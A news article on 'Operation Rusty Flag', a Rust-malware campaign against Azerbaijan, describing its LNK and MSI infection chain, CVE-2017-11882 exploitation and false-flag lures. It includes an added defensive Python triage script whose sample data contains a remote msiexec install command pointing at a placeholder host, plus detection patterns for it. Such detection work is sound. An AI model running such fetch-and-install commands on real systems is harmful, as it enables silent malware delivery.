Rusty Flag Campaign Targets Azerbaijan with Rust-Based Malware

Written by Mitchell Langley

September 20, 2023

A series of targeted attacks centered in Azerbaijan has drawn the attention of experts. This campaign exhibits a distinct characteristic: the deployment of malware crafted in the Rust programming language.

Referred to as “Operation Rusty Flag” by the cybersecurity firm Deep Instinct, this initiative has yet to be associated with any known threat actor or group.

Security analysts Simon Kenin, Ron Ben Yizhak, and Mark Vaitzman, in their comprehensive analysis published last week, shed light on the operation’s multifaceted initial access strategies.

Of particular interest is the utilization of a modified document, previously linked to the Storm-0978 group, as a lure. This raises the intriguing possibility of a calculated “false flag” attempt by the attackers to divert attribution efforts.

The attack chain hinges on an LNK file, aptly named “1.KARABAKH.jpg.lnk,” serving as a launchpad to retrieve a second-stage payload, an MSI installer hosted on Dropbox.

The installer, in turn, deploys a Rust-based implant, accompanied by an XML file scheduled to execute the implant and a decoy image featuring watermarks resembling the symbol of the Azerbaijan Ministry of Defense.
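For defenders, the first two stages described above (a shortcut disguised as an image, then an MSI pulled from a web host) can be triaged from endpoint telemetry. The following is an added example, not code from the Deep Instinct report: the event field names, the extension lists and the sample records are constructed, and the msiexec-from-URL heuristic is an assumption, since the article does not say how the LNK fetches the installer.

```python
import re
from pathlib import PureWindowsPath

# Extensions a user reads as "just a picture or document" (assumed list).
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".doc", ".docx", ".txt"}
# Extensions that launch something when double-clicked (assumed list).
LAUNCH_EXTS = {".lnk", ".exe", ".scr", ".msi", ".js", ".vbs", ".bat", ".cmd"}

# msiexec install switch pointed at an http(s) URL instead of a local path.
# Assumption: the article does not describe the actual download command.
REMOTE_MSI = re.compile(r'\bmsiexec(?:\.exe)?\b.*?[/-](?:i|package)\s+"?https?://', re.I)


def deceptive_double_extension(path):
    """True when the name ends in <decoy ext><launch ext>, e.g. x.jpg.lnk."""
    # Windows ignores trailing spaces and dots, so strip them before parsing.
    name = PureWindowsPath(path).name.rstrip(" .").lower()
    suffixes = PureWindowsPath(name).suffixes
    return (len(suffixes) >= 2
            and suffixes[-1] in LAUNCH_EXTS
            and suffixes[-2] in DECOY_EXTS)


def triage(events):
    """Return (event_index, reason) pairs for suspicious records."""
    findings = []
    for i, ev in enumerate(events):
        if deceptive_double_extension(ev.get("target_file", "")):
            findings.append((i, "double-extension launcher"))
        if REMOTE_MSI.search(ev.get("command_line", "")):
            findings.append((i, "msiexec installing from URL"))
    return findings


# Constructed sample records; "target_file" and "command_line" are
# hypothetical field names standing in for your EDR or Sysmon schema.
SAMPLE_EVENTS = [
    {"target_file": r"C:\Users\user\Downloads\1.KARABAKH.jpg.lnk", "command_line": ""},
    {"target_file": "", "command_line": "msiexec /i https://files.example.invalid/placeholder.msi /qn"},
    {"target_file": r"C:\Users\user\Documents\report.final.docx",
     "command_line": r"msiexec.exe /i C:\temp\local.msi"},
]

if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(idx, reason)
```

Explorer hides the `.lnk` extension by default, so a name like the one in this campaign displays as an image file; the check works on the full on-disk name instead.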

An alternative infection vector involves a Microsoft Office document, titled “Overview_of_UWCs_UkraineInNATO_campaign.docx,” exploiting CVE-2017-11882, a long-standing memory corruption vulnerability in Microsoft Office’s Equation Editor. This exploitation leads to the invocation of a Dropbox URL housing a distinct MSI file, propagating a variant of the same Rust backdoor.

The use of the “Overview_of_UWCs_UkraineInNATO_campaign.docx” document is notable, as a similar filename was employed in recent cyberattacks targeting Ukraine by Storm-0978.

These earlier attacks exploited an Office remote code execution flaw (CVE-2023-36884), potentially suggesting a calculated attempt to make the current campaign appear to be the work of Storm-0978.

The Rust-based backdoor, masquerading as “WinDefenderHealth.exe,” possesses the capability to collect information from the compromised host and transmit it to a server controlled by the attacker.

The ultimate objectives of this campaign remain shrouded in uncertainty, with the possibility of it being a red team exercise not entirely ruled out.

As observed by the researchers, the use of Rust in malware development is on the rise. Current security products are encountering challenges in accurately detecting Rust-based malware, and the reverse engineering process is notably more intricate.
